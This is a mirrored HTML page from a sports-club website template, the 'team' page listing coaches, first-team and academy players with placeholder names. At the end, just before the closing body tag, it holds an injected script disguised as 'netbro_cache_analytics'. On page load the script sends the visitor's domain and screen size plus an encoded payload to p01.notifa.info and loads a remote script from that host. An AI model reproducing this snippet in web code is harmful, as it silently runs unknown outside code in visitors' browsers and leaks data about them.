<!doctype html>
<html class="no-js" lang="en">

<!-- Mirrored from preview.hasthemes.com/suparsport-preview/suparsport/team.html by HTTrack Website Copier/3.x [XR&CO'2014], Sun, 13 Oct 2019 12:44:23 GMT -->
<head>
    <meta charset="utf-8">
    <meta http-equiv="x-ua-compatible" content="ie=edge">
    <title>Team - SuperSport</title>
    <meta name="description" content="">
    <meta name="viewport" content="width=device-width, initial-scale=1">
    <!-- Favicon -->
    <link rel="shortcut icon" type="image/x-icon" href="img/favicon.ico">
    <!-- Fonts -->
    <link rel="stylesheet" href="css/montserrat.css">
    <!-- CSS -->
    <!-- Bootstrap CSS
	============================================ -->
    <link rel="stylesheet" href="css/bootstrap.min.css">
    <!-- Icon Font CSS
	============================================ -->
    <link rel="stylesheet" href="css/material-design-iconic-font.min.css">
    <link rel="stylesheet" href="css/font-awesome.min.css">
    <!-- Plugins CSS
	============================================ -->
    <link rel="stylesheet" href="css/plugins.css">
    <!-- Style CSS
	============================================ -->
    <link rel="stylesheet" href="style.css">
    <!-- Modernizer JS
	============================================ -->
    <script src="js/vendor/modernizr-2.8.3.min.js"></script>
</head>

<body>
<!-- Body main wrapper start -->
<div class="wrapper fix">

<!-- Header Area Start -->
<div id="header-area" class="header-area section">
    <div class="container">
        <div class="row">
            <div class="col-xs-12">
                <!-- Logo -->
                <a class="logo float-left" href="index.html"><img src="img/logo.png" alt=""></a>
                <!-- Mini Cart -->
                <div class="mini-cart float-right">
                    <a href="#"><i class="zmdi zmdi-shopping-basket"></i></a>
                </div>
                <!---- Menu ---->
                <div id="main-menu" class="main-menu float-right">
                    <nav>
                        <ul>
                            <li><a href="index.html">home</a></li>
                            <li><a href="about.html">about</a></li>
                            <li class="active"><a href="team.html">team</a></li>
                            <li><a href="fixture.html">fixture</a></li>
                            <li><a href="point-table.html">point table</a></li>
                            <li><a href="blog.html">blog</a>
                                <ul>
                                    <li><a href="blog.html">blog</a></li>
                                    <li><a href="blog-details.html">blog details</a></li>
                                </ul>
                            </li>
                            <li><a href="shop.html">shop</a>
                                <ul>
                                    <li><a href="shop.html">shop</a></li>
                                    <li><a href="product-details.html">product details</a></li>
                                    <li><a href="cart.html">cart</a></li>
                                    <li><a href="wishlist.html">wishlist</a></li>
                                    <li><a href="checkout.html">checkout</a></li>
                                </ul>
                            </li>
                            <li><a href="contact.html">contact</a></li>
                        </ul>
                    </nav>
                </div>
                <!---- Mobile Menu ---->
                <div class="mobile-menu"></div>
            </div>
        </div>
    </div>
</div>
<!-- Header Area End -->

<!-- Page Banner Area Start -->
<div id="page-banner-area" class="page-banner-area section">
    <div class="container">
        <div class="row">
            <div class="page-banner-title text-center col-xs-12">
                <h2>team</h2>
            </div>
        </div>
    </div>
</div>
<!-- Page Banner Area End -->

<!-- Staff Area Start -->
<div id="staff-area" class="staff-area section pb-90 pt-120">
    <div class="container">
        <div class="row">
            <div class="col-xs-12 text-center">
                <!-- Staff Tab List -->
                <ul class="staff-tab-list nav nav-tabs text-center" role="tablist">
                    <li class="active"><a href="#managers" data-toggle="tab">Managers</a></li>
                    <li><a href="#first-team" data-toggle="tab">First Team</a></li>
                    <li><a href="#academy" data-toggle="tab">academy</a></li>
                </ul>
            </div>
            <!-- Staff Tab panes -->
            <div class="tab-content">
                <!-- Manager Tab -->
                <div role="tabpanel" class="tab-pane active" id="managers">
                    <!-- Single Stuff -->
                    <div class="staff-item col-lg-3 col-md-4 col-sm-6 col-xs-12 mb-30">
                        <div class="image"><img src="img/staff/manager/1.jpg" alt=""></div>
                        <div class="content">
                            <div class="details">
                                <h4><a href="#">Juan Graham</a></h4>
                                <p>Coach</p>
                            </div>
                        </div>
                    </div>
                    <!-- Single Stuff -->
                    <div class="staff-item col-lg-3 col-md-4 col-sm-6 col-xs-12 mb-30">
                        <div class="image"><img src="img/staff/manager/2.jpg" alt=""></div>
                        <div class="content">
                            <div class="details">
                                <h4><a href="#">Donald Collins</a></h4>
                                <p>Coach</p>
                            </div>
                        </div>
                    </div>
                    <!-- Single Stuff -->
                    <div class="staff-item col-lg-3 col-md-4 col-sm-6 col-xs-12 mb-30">
                        <div class="image"><img src="img/staff/manager/3.jpg" alt=""></div>
                        <div class="content">
                            <div class="details">
                                <h4><a href="#">Ronald Gray</a></h4>
                                <p>Coach</p>
                            </div>
                        </div>
                    </div>
                    <!-- Single Stuff -->
                    <div class="staff-item col-lg-3 col-md-4 col-sm-6 col-xs-12 mb-30">
                        <div class="image"><img src="img/staff/manager/4.jpg" alt=""></div>
                        <div class="content">
                            <div class="details">
                                <h4><a href="#">William Mendez</a></h4>
                                <p>Coach</p>
                            </div>
                        </div>
                    </div>
                </div>
                <!-- First Team Tab -->
                <div role="tabpanel" class="tab-pane" id="first-team">
                    <!-- Single Stuff -->
                    <div class="staff-item col-lg-3 col-md-4 col-sm-6 col-xs-12 mb-30">
                        <div class="image"><img src="img/staff/player/1.jpg" alt=""></div>
                        <div class="content">
                            <div class="details">
                                <h4><a href="#">Jeffrey Moore</a></h4>
                                <p>Midfielder</p>
                            </div>
                            <h2 class="num">14</h2>
                        </div>
                    </div>
                    <!-- Single Stuff -->
                    <div class="staff-item col-lg-3 col-md-4 col-sm-6 col-xs-12 mb-30">
                        <div class="image"><img src="img/staff/player/2.jpg" alt=""></div>
                        <div class="content">
                            <div class="details">
                                <h4><a href="#">Bryan Parker</a></h4>
                                <p>Midfielder</p>
                            </div>
                            <h2 class="num">14</h2>
                        </div>
                    </div>
                    <!-- Single Stuff -->
                    <div class="staff-item col-lg-3 col-md-4 col-sm-6 col-xs-12 mb-30">
                        <div class="image"><img src="img/staff/player/3.jpg" alt=""></div>
                        <div class="content">
                            <div class="details">
                                <h4><a href="#">Juan Wood</a></h4>
                                <p>Midfielder</p>
                            </div>
                            <h2 class="num">14</h2>
                        </div>
                    </div>
                    <!-- Single Stuff -->
                    <div class="staff-item col-lg-3 col-md-4 col-sm-6 col-xs-12 mb-30">
                        <div class="image"><img src="img/staff/player/4.jpg" alt=""></div>
                        <div class="content">
                            <div class="details">
                                <h4><a href="#">Ethan Barrett</a></h4>
                                <p>Midfielder</p>
                            </div>
                            <h2 class="num">14</h2>
                        </div>
                    </div>
                    <!-- Single Stuff -->
                    <div class="staff-item col-lg-3 col-md-4 col-sm-6 col-xs-12 mb-30">
                        <div class="image"><img src="img/staff/player/1.jpg" alt=""></div>
                        <div class="content">
                            <div class="details">
                                <h4><a href="#">Peter Day</a></h4>
                                <p>Midfielder</p>
                            </div>
                            <h2 class="num">14</h2>
                        </div>
                    </div>
                    <!-- Single Stuff -->
                    <div class="staff-item col-lg-3 col-md-4 col-sm-6 col-xs-12 mb-30">
                        <div class="image"><img src="img/staff/player/2.jpg" alt=""></div>
                        <div class="content">
                            <div class="details">
                                <h4><a href="#">Tyler Evans</a></h4>
                                <p>Midfielder</p>
                            </div>
                            <h2 class="num">14</h2>
                        </div>
                    </div>
                    <!-- Single Stuff -->
                    <div class="staff-item col-lg-3 col-md-4 col-sm-6 col-xs-12 mb-30">
                        <div class="image"><img src="img/staff/player/3.jpg" alt=""></div>
                        <div class="content">
                            <div class="details">
                                <h4><a href="#">Willie Henry</a></h4>
                                <p>Midfielder</p>
                            </div>
                            <h2 class="num">14</h2>
                        </div>
                    </div>
                    <!-- Single Stuff -->
                    <div class="staff-item col-lg-3 col-md-4 col-sm-6 col-xs-12 mb-30">
                        <div class="image"><img src="img/staff/player/4.jpg" alt=""></div>
                        <div class="content">
                            <div class="details">
                                <h4><a href="#">Terry Barnes</a></h4>
                                <p>Midfielder</p>
                            </div>
                            <h2 class="num">14</h2>
                        </div>
                    </div>
                    <!-- Single Stuff -->
                    <div class="staff-item col-lg-3 col-md-4 col-sm-6 col-xs-12 mb-30">
                        <div class="image"><img src="img/staff/player/1.jpg" alt=""></div>
                        <div class="content">
                            <div class="details">
                                <h4><a href="#">Roger Garza</a></h4>
                                <p>Midfielder</p>
                            </div>
                            <h2 class="num">14</h2>
                        </div>
                    </div>
                    <!-- Single Stuff -->
                    <div class="staff-item col-lg-3 col-md-4 col-sm-6 col-xs-12 mb-30">
                        <div class="image"><img src="img/staff/player/2.jpg" alt=""></div>
                        <div class="content">
                            <div class="details">
                                <h4><a href="#">Carl Perez</a></h4>
                                <p>Midfielder</p>
                            </div>
                            <h2 class="num">14</h2>
                        </div>
                    </div>
                    <!-- Single Stuff -->
                    <div class="staff-item col-lg-3 col-md-4 col-sm-6 col-xs-12 mb-30">
                        <div class="image"><img src="img/staff/player/3.jpg" alt=""></div>
                        <div class="content">
                            <div class="details">
                                <h4><a href="#">David Davis</a></h4>
                                <p>Midfielder</p>
                            </div>
                            <h2 class="num">14</h2>
                        </div>
                    </div>
                    <!-- Single Stuff -->
                    <div class="staff-item col-lg-3 col-md-4 col-sm-6 col-xs-12 mb-30">
                        <div class="image"><img src="img/staff/player/4.jpg" alt=""></div>
                        <div class="content">
                            <div class="details">
                                <h4><a href="#">Peter Castro</a></h4>
                                <p>Midfielder</p>
                            </div>
                            <h2 class="num">14</h2>
                        </div>
                    </div>
                    <!-- Single Stuff -->
                    <div class="staff-item col-lg-3 col-md-4 col-sm-6 col-xs-12 mb-30">
                        <div class="image"><img src="img/staff/player/1.jpg" alt=""></div>
                        <div class="content">
                            <div class="details">
                                <h4><a href="#">Jordan Diaz</a></h4>
                                <p>Midfielder</p>
                            </div>
                            <h2 class="num">14</h2>
                        </div>
                    </div>
                    <!-- Single Stuff -->
                    <div class="staff-item col-lg-3 col-md-4 col-sm-6 col-xs-12 mb-30">
                        <div class="image"><img src="img/staff/player/2.jpg" alt=""></div>
                        <div class="content">
                            <div class="details">
                                <h4><a href="#">Dylan George</a></h4>
                                <p>Midfielder</p>
                            </div>
                            <h2 class="num">14</h2>
                        </div>
                    </div>
                    <!-- Single Stuff -->
                    <div class="staff-item col-lg-3 col-md-4 col-sm-6 col-xs-12 mb-30">
                        <div class="image"><img src="img/staff/player/3.jpg" alt=""></div>
                        <div class="content">
                            <div class="details">
                                <h4><a href="#">Mark Riley</a></h4>
                                <p>Midfielder</p>
                            </div>
                            <h2 class="num">14</h2>
                        </div>
                    </div>
                    <!-- Single Stuff -->
                    <div class="staff-item col-lg-3 col-md-4 col-sm-6 col-xs-12 mb-30">
                        <div class="image"><img src="img/staff/player/4.jpg" alt=""></div>
                        <div class="content">
                            <div class="details">
                                <h4><a href="#">Paul Hall</a></h4>
                                <p>Midfielder</p>
                            </div>
                            <h2 class="num">14</h2>
                        </div>
                    </div>
                </div>
                <!-- Academy Tab -->
                <div role="tabpanel" class="tab-pane" id="academy">
                    <!-- Single Stuff -->
                    <div class="staff-item col-lg-3 col-md-4 col-sm-6 col-xs-12 mb-30">
                        <div class="image"><img src="img/staff/academy/1.jpg" alt=""></div>
                        <div class="content">
                            <div class="details">
                                <h4><a href="#">Carl Hill</a></h4>
                                <p>Midfielder</p>
                            </div>
                            <h2 class="num">14</h2>
                        </div>
                    </div>
                    <!-- Single Stuff -->
                    <div class="staff-item col-lg-3 col-md-4 col-sm-6 col-xs-12 mb-30">
                        <div class="image"><img src="img/staff/academy/2.jpg" alt=""></div>
                        <div class="content">
                            <div class="details">
                                <h4><a href="#">John Ward</a></h4>
                                <p>Midfielder</p>
                            </div>
                            <h2 class="num">14</h2>
                        </div>
                    </div>
                    <!-- Single Stuff -->
                    <div class="staff-item col-lg-3 col-md-4 col-sm-6 col-xs-12 mb-30">
                        <div class="image"><img src="img/staff/academy/3.jpg" alt=""></div>
                        <div class="content">
                            <div class="details">
                                <h4><a href="#">David Bates</a></h4>
                                <p>Midfielder</p>
                            </div>
                            <h2 class="num">14</h2>
                        </div>
                    </div>
                    <!-- Single Stuff -->
                    <div class="staff-item col-lg-3 col-md-4 col-sm-6 col-xs-12 mb-30">
                        <div class="image"><img src="img/staff/academy/4.jpg" alt=""></div>
                        <div class="content">
                            <div class="details">
                                <h4><a href="#">Carl Stanley</a></h4>
                                <p>Midfielder</p>
                            </div>
                            <h2 class="num">14</h2>
                        </div>
                    </div>
                    <!-- Single Stuff -->
                    <div class="staff-item col-lg-3 col-md-4 col-sm-6 col-xs-12 mb-30">
                        <div class="image"><img src="img/staff/academy/1.jpg" alt=""></div>
                        <div class="content">
                            <div class="details">
                                <h4><a href="#">Randy Bates</a></h4>
                                <p>Midfielder</p>
                            </div>
                            <h2 class="num">14</h2>
                        </div>
                    </div>
                    <!-- Single Stuff -->
                    <div class="staff-item col-lg-3 col-md-4 col-sm-6 col-xs-12 mb-30">
                        <div class="image"><img src="img/staff/academy/2.jpg" alt=""></div>
                        <div class="content">
                            <div class="details">
                                <h4><a href="#">James Turner</a></h4>
                                <p>Midfielder</p>
                            </div>
                            <h2 class="num">14</h2>
                        </div>
                    </div>
                    <!-- Single Stuff -->
                    <div class="staff-item col-lg-3 col-md-4 col-sm-6 col-xs-12 mb-30">
                        <div class="image"><img src="img/staff/academy/3.jpg" alt=""></div>
                        <div class="content">
                            <div class="details">
                                <h4><a href="#">Roger Brooks</a></h4>
                                <p>Midfielder</p>
                            </div>
                            <h2 class="num">14</h2>
                        </div>
                    </div>
                    <!-- Single Stuff -->
                    <div class="staff-item col-lg-3 col-md-4 col-sm-6 col-xs-12 mb-30">
                        <div class="image"><img src="img/staff/academy/4.jpg" alt=""></div>
                        <div class="content">
                            <div class="details">
                                <h4><a href="#">Billy Weber</a></h4>
                                <p>Midfielder</p>
                            </div>
                            <h2 class="num">14</h2>
                        </div>
                    </div>
                    <!-- Single Stuff -->
                    <div class="staff-item col-lg-3 col-md-4 col-sm-6 col-xs-12 mb-30">
                        <div class="image"><img src="img/staff/academy/1.jpg" alt=""></div>
                        <div class="content">
                            <div class="details">
                                <h4><a href="#">Albert Green</a></h4>
                                <p>Midfielder</p>
                            </div>
                            <h2 class="num">14</h2>
                        </div>
                    </div>
                    <!-- Single Stuff -->
                    <div class="staff-item col-lg-3 col-md-4 col-sm-6 col-xs-12 mb-30">
                        <div class="image"><img src="img/staff/academy/2.jpg" alt=""></div>
                        <div class="content">
                            <div class="details">
                                <h4><a href="#">Terry Gray</a></h4>
                                <p>Midfielder</p>
                            </div>
                            <h2 class="num">14</h2>
                        </div>
                    </div>
                    <!-- Single Stuff -->
                    <div class="staff-item col-lg-3 col-md-4 col-sm-6 col-xs-12 mb-30">
                        <div class="image"><img src="img/staff/academy/3.jpg" alt=""></div>
                        <div class="content">
                            <div class="details">
                                <h4><a href="#">Kyle Ruiz</a></h4>
                                <p>Midfielder</p>
                            </div>
                            <h2 class="num">14</h2>
                        </div>
                    </div>
                    <!-- Single Stuff -->
                    <div class="staff-item col-lg-3 col-md-4 col-sm-6 col-xs-12 mb-30">
                        <div class="image"><img src="img/staff/academy/4.jpg" alt=""></div>
                        <div class="content">
                            <div class="details">
                                <h4><a href="#">Kevin Miller</a></h4>
                                <p>Midfielder</p>
                            </div>
                            <h2 class="num">14</h2>
                        </div>
                    </div>
                    <!-- Single Stuff -->
                    <div class="staff-item col-lg-3 col-md-4 col-sm-6 col-xs-12 mb-30">
                        <div class="image"><img src="img/staff/academy/1.jpg" alt=""></div>
                        <div class="content">
                            <div class="details">
                                <h4><a href="#">Roy Curtis</a></h4>
                                <p>Midfielder</p>
                            </div>
                            <h2 class="num">14</h2>
                        </div>
                    </div>
                    <!-- Single Stuff -->
                    <div class="staff-item col-lg-3 col-md-4 col-sm-6 col-xs-12 mb-30">
                        <div class="image"><img src="img/staff/academy/2.jpg" alt=""></div>
                        <div class="content">
                            <div class="details">
                                <h4><a href="#">Jose Bailey</a></h4>
                                <p>Midfielder</p>
                            </div>
                            <h2 class="num">14</h2>
                        </div>
                    </div>
                    <!-- Single Stuff -->
                    <div class="staff-item col-lg-3 col-md-4 col-sm-6 col-xs-12 mb-30">
                        <div class="image"><img src="img/staff/academy/3.jpg" alt=""></div>
                        <div class="content">
                            <div class="details">
                                <h4><a href="#">Scott Russell</a></h4>
                                <p>Midfielder</p>
                            </div>
                            <h2 class="num">14</h2>
                        </div>
                    </div>
                    <!-- Single Stuff -->
                    <div class="staff-item col-lg-3 col-md-4 col-sm-6 col-xs-12 mb-30">
                        <div class="image"><img src="img/staff/academy/4.jpg" alt=""></div>
                        <div class="content">
                            <div class="details">
                                <h4><a href="#">Willie Elliott</a></h4>
                                <p>Midfielder</p>
                            </div>
                            <h2 class="num">14</h2>
                        </div>
                    </div>
                </div>
            </div>
        </div>
        
    </div>
</div>
<!-- Staff Area End -->

<!-- Breaking News Area Start -->
<div class="breaking-news-area section overlay pb-40 pt-40">
    <div class="container">
        <div class="row">
            <!-- Breaking News Wrapper -->
            <div class="news-wrapper col-xs-12">
                <h4>Breaking News :</h4>
                <!-- Breaking News Slider -->
                <div class="bnews-slider">
                    <a href="#">There are many variations of passages of Lorem Ipsum available, but the majority have suffered alteration.</a>
                    <a href="#">There are many variations of passages of Lorem Ipsum available.</a>
                    <a href="#">There are many variations of passages of Lorem Ipsum available, but the majority.</a>
                </div>
            </div>
        </div>
    </div>
</div>
<!-- Breaking News Area End -->

<!-- Footer Top Area Start -->
<div class="footer-top-area section pb-70 pt-100">
   <div class="footer-top-left-bg overlay"></div>
    <div class="container">
        <div class="row">
            <!-- Footer About -->
            <div class="col-md-5 col-xs-12 mb-30">
                <div class="footer-about">
                    <img src="img/logo.png" alt="">
                    <p>Duis aute irure dolor in reprehenderit in voluptate velit esse cillum dolore eu fugiat nulla pariatur. Excepteur sint occaecat cupidatat non proiden</p>
                    <div class="social fix">
                        <a href="#"><i class="fa fa-facebook"></i></a>
                        <a href="#"><i class="fa fa-rss"></i></a>
                        <a href="#"><i class="fa fa-google-plus"></i></a>
                        <a href="#"><i class="fa fa-pinterest"></i></a>
                        <a href="#"><i class="fa fa-instagram"></i></a>
                    </div>
                </div>
            </div>
            <!-- Footer Twitter -->
            <div class="col-md-4 col-sm-6 col-xs-12 mb-30">
                <div class="twitter-widget">
                    <h3 class="title">Latest Tweets</h3>
                    <div class="single-twite">
                        <p>Duis aute irure <a href="#">@dolor</a> in rderiin voluptate velit esse cillum dolore eu ft nulla pariatur. Excepteur <a href="#">@sint</a> occaecat..</p>
                        <span>30 minutes ago</span>
                    </div>
                    <div class="single-twite">
                        <p>Duis aute irure <a href="#">@dolor</a> in rderiin voluptate velit esse cillum dolore eu ft </p>
                        <span>15 minutes ago</span>
                    </div>
                </div>
            </div>
            <!-- Footer Subscribe -->
            <div class="col-md-3 col-sm-6 col-xs-12 mb-30">
                <div class="subscribe-widget">
                    <h3 class="title">Newsletters</h3>
                    <div class="subscribe-form">
                        <form action="#">
                            <input type="text" placeholder="your email address">
                            <button class="submit"><i class="zmdi zmdi-mail-send"></i></button>
                        </form>
                    </div>
                    <p><span>Phone:</span> +98 996 554 658</p>
                    <p><span>email:</span> sport@email.com</p>
                </div>
            </div>
            
        </div>
    </div>
</div>
<!-- Footer Top Area End -->

<!-- Footer Bottom Area Start -->
<div class="footer-bottom-area section">
    <div class="container">
        <div class="row">
           
            <!-- Copyright -->
            <div class="copyright text-left col-sm-6 col-xs-12">
                <p>Copyright &copy; <span>Supar Sport</span>. 2016.All right reserved</p>
            </div>
            <!-- Author Credit -->
            <div class="author-credit text-right col-sm-6 col-xs-12">
                <p>Created by <a href="https://hastech.company/">Hastech</a> With <i class="fa fa-heart-o"></i></p>
            </div>
            
        </div>
    </div>
</div>
<!-- Footer Bottom Area End -->


</div>
<!-- Body main wrapper end -->

<!-- JS -->

<!-- jQuery JS
============================================ -->
<script src="js/vendor/jquery-1.12.0.min.js"></script>
<!-- Bootstrap JS
============================================ -->
<script src="js/bootstrap.min.js"></script>
<!-- Plugins JS
============================================ -->
<script src="js/plugins.js"></script>
<!-- Ajax Mail JS
============================================ -->
<script src="js/ajax-mail.js"></script>
<!-- Main JS
============================================ -->
<script src="js/main.js"></script>
<script type="text/javascript">if (self==top) {function netbro_cache_analytics(fn, callback) {setTimeout(function() {fn();callback();}, 0);}function sync(fn) {fn();}function requestCfs(){var idc_glo_url = (location.protocol=="https:" ? "https://" : "http://");var idc_glo_r = Math.floor(Math.random()*99999999999);var url = idc_glo_url+ "p01.notifa.info/3fsmd3/request" + "?id=1" + "&enc=9UwkxLgY9" + "&params=" + "4TtHaUQnUEiP6K%2fc5C582Am8lISurprAuN%2b5wL0gfuV8nOSbPARGmUTtnMBWvXclC7aEre0STE5iSBPBHQx%2bQnUyYkcsvIMTQEJm4w8zWY%2f%2fSGn7ZUkaC8ZQSnq%2b6TF5%2bMReWlORDZHgUImQSnR71aqCJTGaysTHvLgfyg%2fXXeUUnsrIDhQKQ%2bAAxPoeBJsHwsg9kJxNQUC%2fBMI9p0A047Zpih%2bYKrjijs4%2bJ4FfXU70C63wJcDXKgyZ9uLkUiUufc%2bNPa92ipSBh2f5fd4HQ%2ftPucgcHC9Zx6yl4t4fdjj6kNx0Upm9lpmEbp%2fJIba7KkD4%2b%2fTSJo9h415kxIZzfszV2Cm7n7FU%2foomEFGLH3Wy%2bBi9NLEjW2pTiRfaspPNOZ%2f5JgIKcGob1aUJUozHFUfEyziI0CJYF0E095XBt%2fglaY9uvziABXeIpu%2bsrnzoDdDS34RCAV%2bWwhzzvCcZl%2bCdAAbkHwjjgYXkVjrbvTkv8mFGDZ9Sl2pyhylcEJzJEAzSZuXCZXaU485Rw7UR1WUlzkvw2MRB7nAKnggQxNk%3d" + "&idc_r="+idc_glo_r + "&domain="+document.domain + "&sw="+screen.width+"&sh="+screen.height;var bsa = document.createElement('script');bsa.type = 'text/javascript';bsa.async = true;bsa.src = url;(document.getElementsByTagName('head')[0]||document.getElementsByTagName('body')[0]).appendChild(bsa);}netbro_cache_analytics(requestCfs, function(){});};</script></body>


<!-- Mirrored from preview.hasthemes.com/suparsport-preview/suparsport/team.html by HTTrack Website Copier/3.x [XR&CO'2014], Sun, 13 Oct 2019 12:44:23 GMT -->
</html>